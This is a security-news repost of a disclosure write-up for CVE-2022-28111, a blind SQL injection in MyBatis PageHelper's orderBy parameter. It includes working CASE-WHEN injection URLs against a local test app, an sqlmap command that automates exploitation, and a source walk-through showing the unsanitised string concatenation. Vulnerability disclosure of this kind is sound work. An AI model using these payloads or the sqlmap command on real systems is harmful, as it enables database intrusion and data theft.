Security
Headlines
HeadlinesLatestCVEs

Headline

CVE-2022-28111: Pagehelper has a SQL injection vulnerability validation process - 睡不醒,好烦啊

MyBatis PageHelper v1.x.x-v5.x.x was discovered to contain a time-blind SQL injection vulnerability via the orderBy parameter.

CVE
Open in Source
#sql#vulnerability#web#git#java#maven

Pagehelper has a SQL injection vulnerability validation process

Note: A Boolean blind and time blind SQL injection vulnerability exists in the orderBy parameter of pegehelper

Official website: https://pagehelper.github.io/

Source code: https://github.com/pagehelper/Mybatis-PageHelper

Git:https://github.com/pagehelper/Mybatis-PageHelper.git

Verification Process:

  1.  Local environment: SpringBoot+MyBatis+Maven+MySQL

  2.  Visit the page with the sort parameter orderBy

  3.  Visit URL:http://127.0.0.1:8080/testBook/testPageHelper1?pageNum=1&pageSize=10&orderBy=(SELECT (CASE WHEN **(1=1)**THEN 'costprice' ELSE (SELECT 1 UNION SELECT 2) END))  

  1.  Visit URL:http://127.0.0.1:8080/testBook/testPageHelper1?pageNum=1&pageSize=10&orderBy=(SELECT (CASE WHEN **(1=2)**THEN 'costprice' ELSE (SELECT 1 UNION SELECT 2) END))

  2.  Scan using sqlmap, command:python3 sqlmap.py -u "http://127.0.0.1:8080/testBook/testPageHelper1?pageNum=1&pageSize=10&orderBy=costprice\*" --batch --dbms=mysql

View the source code:

  1.  In the converToOrderBySql function of \\com\\github\\pagehelper\\parser\\OrderByParser.java, stitch the SQL statements of the mapper with pageNum, pageSize, and orderBy

  2.  The function directly stitches the mapper SQL statement \[select \* from book\] with the value submitted by the orderBy parameter \[(SELECT (CASE WHEN (1=1) THEN 'costprice' ELSE (SELECT 1 UNION SELECT 2) END))\]

  3.  The value returned by converToOrderBySql is assigned to sql, sql=SELECT \* FROM book order by (SELECT (CASE WHEN (1=1) THEN 'costprice' ELSE (SELECT 1 UNION SELECT 2) END))

  4.  GetPageSql then stitches sql and LIMIT into the final query statement

  5.  In MySQL, you can view the history of executed SQL statements, and you can see that the parameters submitted by the orderBy parameter are completely put into the SQL statement of the query\[ SELECT \* FROM book order by (SELECT (CASE WHEN (1=2) THEN 'costprice' ELSE (SELECT 1 UNION SELECT 2) END)) LIMIT 10 \]

CVE: Latest News

CVE-2023-50976: Transactions API Authorization by oleiman · Pull Request #14969 · redpanda-data/redpanda
CVE
CVE-2023-6905
CVE
CVE-2023-6903
CVE
CVE-2023-6904
CVE
CVE-2023-3907
CVE